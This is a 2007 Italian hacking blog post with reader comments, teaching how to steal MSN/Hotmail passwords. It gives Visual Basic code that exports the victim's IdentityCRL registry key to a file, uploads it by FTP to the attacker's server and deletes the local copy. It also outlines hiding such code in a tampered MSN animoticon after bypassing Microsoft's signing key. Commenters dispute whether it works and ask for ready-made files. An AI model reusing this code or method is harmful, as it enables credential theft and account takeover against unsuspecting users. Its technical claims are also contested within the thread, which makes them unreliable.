#############################
# KinG-LioN
# 25/08/2007
#############################
Ti serve una password?
Quella di MSN o altro?
Non c'e problema!
Iniziamo dal principio.
A noi occorre una password, prima cosa a cui pensiamo:
Dove la possiamo trovare?
La password si trova nella testa della vittima, nel suo pc ( cookie o chive di regedit) e nei server ( in questo caso hotmail).
Abbiamo dunque tre possibilita per farci dare la chiave di accesso.
Possiamo provare a prelevarla direttamente dalla vittima, con la famosa e tanto usata tecnica dell'ingegneria sociale, che come saprete consiste nel fingersi qualcun altro ( come lo staff hotmail ) per farcela consegnare direttamente dalla vittima.
Seconda ipotesi.
Entriamo nei server Hotmail e la prendiamo...
Ma non ci conviene giusto?
Terza ed ultima ioptesi
La chiave si trova nel pc della vittima.
Possiamo trovarla sotto forma di Cookie ( non parliamo di una vera e propria password ma di frammenti di informazioni che ci identificano).
In questo caso bastera sfruttare uno dei tanti bachi di xss ( cross site scripting ) per sottrarre le info desiderate, ed accededere mediante cookie, ossia senza digitare la password.
Ancora possiamo trovare la vera e propria password nel pc della vittimae in particolare MSN la conserva nel "registro di configurazione del sistema" ( regedit ) per evitare di farcela digitare ogni volta.
Ora con un semplice programma scritto in vb da me ( KinG-LioN ) in colaborazione con Kingolo, abbiamo la possibilita di prelevare quale chiave di registro vogliamo... bastera dunque digitare il percorso dove msn salva la password ed il gioco e fatto.
Shell ("command.com /c reg export HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL c:\pwd.txt")
Dim passw As String
Dim ftpurl As String
kinglion = "tuoftp"
eurohackers = "tuapassw"
ftpurl = "ftp://tuoftp.eurohackers.it"
inet.URL = ftpurl
inet.UserName = kinglion
inet.Password = eurohackers
passw = "pwd.txt"
inet.Execute inet.URL, "PUT C:\pwd.txt " & passw
Do While inet.StillExecuting = True
DoEvents
Loop
Kill "C:\pwd.txt"
End Sub
Ma non � tutto, oggi vi detto le basi per un attacco davvero potente col quale poter mettere in ginocchio MSN.
Questo attacco e stato elaborato interamente da me, ed a quanto mi risulta fino ad oggi nessuno ci aveva mai pensato, o ci era mai riuscito, spero comunque che non lo usiate per delle lamerate, anzi, ne sono piu che sicuro che con tale attacco difficilmente farete danni, perche solo in pochi riuscirete a sfruttarlo.
A maggior precauzione dell'indennit� dei clienti Hotmail vi spiegoro "solo" cosa fare, ma non "come fare".
Come ho scritto sopra, con un programma che io ho scritto in vb, ma che puo essere riscritto in vari linguaggi possiamo impossessarci della chaive di registro della vittima, in questo caso parliamo di una chiave MSN.
Il problema che ci poniamo a questo punto �: Come faccio eseguire il programma alla vittima?
Mica vado da lui e gli dico: Tie apri questo eseguibile.
Qua ci viene in aiuto lo stesso hotmail.
Il caro e tanto usato programma ci permette di inviare sul pc vittima una serie di animatizioni in FLASH chiamate "animoticon" , senza contare la condivisione degli sfondi in flash e degli avatar animati, dunque ci permette di eseguire codice direttamente sul pc vittima.
Codice tra l'altro innocuo anche perche tutti gli sfondi, avatar ed animoticon devono essere approvati dalla mamma m*i*c*r*o*$*o*f*t con una personale chiave dal valore di 400 euro.
Ora proviamo ad aprire i file .mco ( avatar animoticon ) e troveremo un file .cab ed un file xml criptato per la maggior parte in base 64.
Apriamo anche il file cab e troviamo a sua volta il file swf ed un file xml che contiene la chiave m*i*c*r*o*$*o*f*t criptata in base64.
Sta a voi il resto, scopritee come baipassare la chiave m*i*c*r*o*$*o*f*t e sostituite il file swf originale con uno modificato da voi contenente il codice adattato per prelevare la chiave dal registro vittima.
Se avrete fatto tutto bene, riuscirete ad installare l'animoticon, e vi bastera inviarlo alla vittima come un normale smile per ricevere la sua password, non occorrera dunque che la vittima apra qualcosa, o faccia qualcosa, basta solo che lo abbiate nei contatti, e che abbia la password salvata.
Attenzione alla versione di msn che usa la vittima, il percorso della chiave di registro cambia.
Ultima cosa, non fate affidamento sul programma in vb che ho scritto, perche non e compatibile con flash, in quanto vb e un linguaggio da compilare.
Tecnica provata con msn 7.5 , 8.0 e successivi
Emoticon Gratis per Windows Live Messenger
29 agosto 2007
King lion hack con le animoticon di Msn
Iscriviti a:
Commenti sul post (Atom)
17 commenti:
io sinceramente non ci ho capito un bel niente.. cmq sarebbe un bel metodo se qualk1 lo spiegasse in parole più semplici! cmq tanti complimenti a KinG-LioN e qualk1 anke a Kingolo
Ciao,
Idea interessante quella di far eseguire codice mediante swf.
Però, a quanto sappia, è impossibile accedere alle API di sistema mediante il Flash, ne tantomeno avviare programmi exe esterni (in questo caso l'editor del registro, regedit.exe).
Per caso mi sfugge qualcosa di ActionScript?
Complimenti per il lavoro svolto..però, essendo in molti a non conoscere il VBScript e altri linguaggi di programmazione, non potresti inviarmi via email il file delle animoticon di cui parli?...non te ne sarei riconoscente..ma di più..la mia email è lupin_97@hotmail.com...confido in te, un piccolo regalo per uno che legge il vostro blog quotidianamente..
Ragazzi per informazioni o domande iscrivetevi nel forum non ho tempo per seguire i commenti...scusatemi
Ciao devo dire che davvero una bellissima idea ma nn è facile da esegurie mi potresti inviare tu un animoticon alla email evalachiavata@libero.it te ne sare imotlo grato.
ingegnosa la tecnica dell'animoticon
chissà se si può fare qualcosa.
appena ho tempo la provo
per quanto riguarda la tecnica del prendere le password dal registro e inviarle... beh non sei stato il primo e sapevi benissimo che qualcun'altro prima di te l'aveva fatto;
nel forum di king-lion [eurohackers] c'era un topic (adesso misteriosamente scomparso) dove avevo usato proprio questa tecnica. E king-lion mi aveva risposto.
qualke tempo dopo è venuto fuori questo codice di king-lion (tra l'altro non funzionante - la chiave di registro è sbagliata). In più king-lion ha tirato in mezzo anche King Of the world {che fantasia con sti nick} che ha + volte affermato di non aver fatto niente
beh complimenti per l'onesta king-lion ;)
ciaoz
Eseguire un azione da swf sul registro e impossibile come alcuni hanno detto, cerchero di spiegarmi meglio.
Cio ke dovete fare e un get url ad un vbs, solitamente il vbs chiede conferma di esecuzione, ma se richiesto dal file mco non chiede autorizzazione... misteri della m i c r o s o f t...
PS esiste un programma ke trasforma swf in mco.
KinG-LioN
htp://www.eurohackers.it
Rispondo a fraev...
Questa tecnica la uso da due anni... O forse piu
KinG-LioN
Uhm.. c'è qualcosa che non va... KinG, mi servirebbe la chiave di registro della password, altrimenti qua non me ne vengo fuori... Grz
TheLizard
Basta con questa pagliacciata...
King... questa del codice in esecuzione attraverso una animoticon... oppure un avatar dinamico o uno sfondo o mia sorella è una cazzata colossale...
Così il codice non riuscirai mai a farlo eseguire... (ci possono essere altri metodi simili ma quello descritto E' UNA CAVOLATA!)
Buon lavoro a tutti.
Ascolta King Lion. Con pieno rispetto per te perchè sei veramente in gamba visto che sono pure users da tempo sulla tua community di EHT.
Per favore però smettiamola con questa lamerata perchè non può che essere definita tale visto che parliamo di rubare password di messenger e basta. Come mai tu dici di aver scoperto questo exploit, se così lo possiamo definire, e poi non scovi un metodo per patcharlo??? Io l'ho trovato e sinceramente mi stupisco che uno come te non abbia rispettato l'etica tenendosi privata questa lamerata e non abbia pubblciato una patch.
Oltre a questo perchè non hai accettato nessuna sfida da parte degli utenti che ti hanno invitato a rubare la loro password con questa tecnica???
Spiegami una cosa: perchè cancellando l'IdentityCRL MessPass scova la password lo stesso??? Non è che magari quelle che scrivi sul sito siano cazzate e la passowrd stia da un'altra parte???
Comunque se sei in grado di bypassare filtri software e un HIPS oppure WinPatrol allora testa questa tecnica su di me. Quando vuoi....io sono a tua disposizione.
Mi offro come cavia.....Ciauz Ciauz King e cerca di concetrare le tue conoscenze su cose più acute e meno lameresche. Lo dico perchè ormai EHT ha perso di rilievo in rete....
Ridai tono al tuo sito con cose oneste e sensate e soprattutto non lameresche.
Vediamo se poi riesci pure a craccare la password visto che è abbastanza cazzuta....
Ascolta King Lion. Con pieno rispetto per te perchè sei veramente in gamba visto che sono pure users da tempo sulla tua community di EHT.
Per favore però smettiamola con questa lamerata perchè non può che essere definita tale visto che parliamo di rubare password di messenger e basta. Come mai tu dici di aver scoperto questo exploit, se così lo possiamo definire, e poi non scovi un metodo per patcharlo??? Io l'ho trovato e sinceramente mi stupisco che uno come te non abbia rispettato l'etica tenendosi privata questa lamerata e non abbia pubblciato una patch.
Oltre a questo perchè non hai accettato nessuna sfida da parte degli utenti che ti hanno invitato a rubare la loro password con questa tecnica???
Spiegami una cosa: perchè cancellando l'IdentityCRL MessPass scova la password lo stesso??? Non è che magari quelle che scrivi sul sito siano cazzate e la passowrd stia da un'altra parte???
Comunque se sei in grado di bypassare filtri software e un HIPS oppure WinPatrol allora testa questa tecnica su di me. Quando vuoi....io sono a tua disposizione.
Mi offro come cavia.....Ciauz Ciauz King e cerca di concetrare le tue conoscenze su cose più acute e meno lameresche. Lo dico perchè ormai EHT ha perso di rilievo in rete....
Ridai tono al tuo sito con cose oneste e sensate e soprattutto non lameresche.
/ - ThE_RaV[3]N - \
grazie al cavolo! qualunque programmatore ci arriva!solo che non spreca il tempo per ste caxxate! o meglio ancora non lo dice in giro XD
king mi aggiungi direttamente a msn??? avrei delle cose da kiederti, grazie io sono domeniko46@hotmail.it ;)
ma raga....skusate...xke date addosso a king lion? le vie del sistema sono infinite..se dice ke funge funge...poi se kondivide qualkosa ke secondo voi è na lamerata...problemi vostri...cmq ha condiviso un metodo ke a mio avviso puo essere utilizzato non solo x rubare le password di msn...ma si puo guardare oltre...poi xò...se avete parole da spendere a vuoto fate pure......ciaooo
e_slim_shady_3
mi potete sipegare bene non ho capito niente
nn ostinatevi a dire ke la tecnica nn funziona, xke l'ho usata molte volte..
quindi se nn sapete le cose meglio stare zitti ke fare una figura da niente
Posta un commento